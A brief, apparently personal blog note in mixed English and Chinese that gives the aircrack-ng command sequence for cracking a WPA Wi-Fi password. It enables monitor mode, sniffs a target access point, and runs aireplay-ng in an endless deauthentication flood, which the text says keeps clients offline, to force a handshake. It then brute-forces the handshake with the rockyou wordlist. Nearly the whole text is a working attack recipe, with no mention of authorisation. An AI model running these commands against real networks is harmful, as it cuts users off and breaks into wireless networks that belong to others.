aircrakf

时间:2023-03-08 17:00:15

airmon-ng start wlan0

airodump-ng wlan0mon#find the wifi

airodump-ng -w yakoazz -c 1 --bssid BE:5F:F6:97:67:6B wlan0mon#-c is wifi channel, -w is name(any name is ok),-bssis is Mac
解释:–bssid嗅探指定无线AP,后面跟着AP的bssid,如下图

这时候可以等待握手包的获取。

为了加速握手包的获取,我们可以使用aireplay来给AP发送断开包:

aireplay-ng -0 0 -a BE:5F:F6:97:67:6B wlan0mon
解释:-0为模式中的一种:冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上网,-a 指定无线AP的mac地址,即为该无线网的bssid值,上图可以一目了然。
这时候我们在右上角可以看到WPA handshake字样,后面跟着bssid,即为抓到了该无线网的握手包,我们可以使用CTRL+C来停止嗅探握手包。

aircrack-ng yakoazz-03.cap -w /usr/share/wordlists/rockyou.txt

http://www.vuln.cn/2683